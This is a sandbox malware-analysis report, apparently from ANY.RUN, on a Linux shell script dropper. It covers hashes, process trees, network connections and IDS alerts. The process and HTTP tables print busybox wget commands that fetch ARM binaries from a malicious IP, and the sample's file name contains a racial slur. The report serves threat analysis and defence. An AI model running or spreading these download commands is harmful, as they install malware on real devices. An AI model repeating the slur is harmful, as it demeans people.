Malware analysis lickmynutsnigah.sh Malicious activity

Add for printing

File name:	lickmynutsnigah.sh
Full analysis:	https://app.any.run/tasks/bb1b7c3a-086e-44d1-9a21-5a133bd40487
Verdict:	Malicious activity
Analysis date:	March 24, 2025, 13:02:35
OS:	Ubuntu 22.04.2
MIME:	text/plain
File info:	ASCII text, with CRLF line terminators
MD5:	FCE6356958F0E5BC1A978C8C6E5D209C
SHA1:	ECC665A2AC1028E9712F7CE5DADA0B199311B2A3
SHA256:	04F9879674593779D0DDD922A2DCDF61A2F252C79930705F0BAA2C80632CF131
SSDEEP:	12:6GMDOeHaG/nAv8aGUvaGpaGTKjOLpUaGlvaGPOTExwaGpaGSEaGi:0S4jIUz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
No malicious indicators.
SUSPICIOUS
- Creates files in the user directory
  - busybox (PID: 40708)
  - busybox (PID: 40667)
- Modifies file or directory owner
  - sudo (PID: 40661)
- Potential Corporate Privacy Violation
  - busybox (PID: 40667)
  - busybox (PID: 40708)
- Executes commands using command-line interpreter
  - sudo (PID: 40664)
- Connects to the server without a host name
  - busybox (PID: 40667)
  - busybox (PID: 40708)
INFO
No info indicators.

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

241

Monitored processes

20

Malicious processes

0

Suspicious processes

3

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
40660	/bin/sh -c "sudo chown user /tmp/lickmynutsnigah\.sh && chmod +x /tmp/lickmynutsnigah\.sh && DISPLAY=:0 sudo -iu user /tmp/lickmynutsnigah\.sh "	/usr/bin/dash	—	any-guest-agent
User: root Integrity Level: UNKNOWN
40661	sudo chown user /tmp/lickmynutsnigah.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
40662	chown user /tmp/lickmynutsnigah.sh	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
40663	chmod +x /tmp/lickmynutsnigah.sh	/usr/bin/chmod	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
40664	sudo -iu user /tmp/lickmynutsnigah.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN
40665	-bash --login -c \/tmp\/lickmynutsnigah\.sh	/usr/bin/bash	—	sudo
User: user Integrity Level: UNKNOWN
40666	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
40667	busybox wget http://213.209.129.92/bins/arm.fkunigr	/usr/bin/busybox		bash
User: user Integrity Level: UNKNOWN Exit code: 0
40668	systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service	/usr/bin/systemctl	—	snapd
User: root Integrity Level: UNKNOWN Exit code: 0
40669	systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service	/usr/bin/systemctl	—	snapd
User: root Integrity Level: UNKNOWN Exit code: 0

Add for printing

Executable files

0

Suspicious files

1

Text files

0

Unknown types

0

Dropped files

PID	Process	Filename		Type
40667	busybox	/home/user/arm.fkunigr		binary
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

3

TCP/UDP connections

13

DNS requests

11

Threats

2

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
40667	busybox	GET	200	213.209.129.92:80	http://213.209.129.92/bins/arm.fkunigr	unknown	—	—	malicious
40708	busybox	GET	—	213.209.129.92:80	http://213.209.129.92/bins/arm5.fkunigr	unknown	—	—	malicious
—	—	GET	204	185.125.190.17:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	91.189.91.98:80	connectivity-check.ubuntu.com	Canonical Group Limited	US	whitelisted
484	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
—	—	185.125.190.17:80	connectivity-check.ubuntu.com	Canonical Group Limited	GB	whitelisted
—	—	212.102.56.178:443	odrs.gnome.org	Datacamp Limited	DE	whitelisted
512	snapd	185.125.188.55:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
512	snapd	185.125.188.58:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
40667	busybox	213.209.129.92:80	—	combahton GmbH	DE	malicious
512	snapd	185.125.188.59:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
40708	busybox	213.209.129.92:80	—	combahton GmbH	DE	malicious

DNS requests

Domain	IP	Reputation
connectivity-check.ubuntu.com	2620:2d:4000:1::98 2620:2d:4000:1::23 2001:67c:1562::23 2620:2d:4000:1::97 2620:2d:4000:1::2b 2620:2d:4000:1::22 2620:2d:4002:1::197 2001:67c:1562::24 2620:2d:4000:1::96 2620:2d:4002:1::196 2620:2d:4002:1::198 2620:2d:4000:1::2a 185.125.190.17 185.125.190.98 91.189.91.48 185.125.190.48 91.189.91.97 91.189.91.96 185.125.190.96 91.189.91.49 91.189.91.98 185.125.190.97 185.125.190.18 185.125.190.49	whitelisted
google.com	142.250.185.78 2a00:1450:4001:81c::200e	whitelisted
odrs.gnome.org	212.102.56.178 195.181.175.41 169.150.255.183 169.150.255.181 207.211.211.26 37.19.194.80 195.181.170.18 2a02:6ea0:c700::19 2a02:6ea0:c700::112 2a02:6ea0:c700::18 2a02:6ea0:c700::101 2a02:6ea0:c700::11 2a02:6ea0:c700::21 2a02:6ea0:c700::107	whitelisted
api.snapcraft.io	185.125.188.55 185.125.188.58 185.125.188.54 185.125.188.59 2620:2d:4000:1010::344 2620:2d:4000:1010::117 2620:2d:4000:1010::42 2620:2d:4000:1010::6d	whitelisted
9.100.168.192.in-addr.arpa	—	unknown

Threats

PID	Process	Class	Message
40667	busybox	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
40708	busybox	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP

Add for printing

No debug info

General Info

lickmynutsnigah.sh

FCE6356958F0E5BC1A978C8C6E5D209C

ECC665A2AC1028E9712F7CE5DADA0B199311B2A3

04F9879674593779D0DDD922A2DCDF61A2F252C79930705F0BAA2C80632CF131

12:6GMDOeHaG/nAv8aGUvaGpaGTKjOLpUaGlvaGPOTExwaGpaGSEaGi:0S4jIUz

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

SUSPICIOUS

Creates files in the user directory

Modifies file or directory owner

Potential Corporate Privacy Violation

Executes commands using command-line interpreter

Connects to the server without a host name

INFO

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings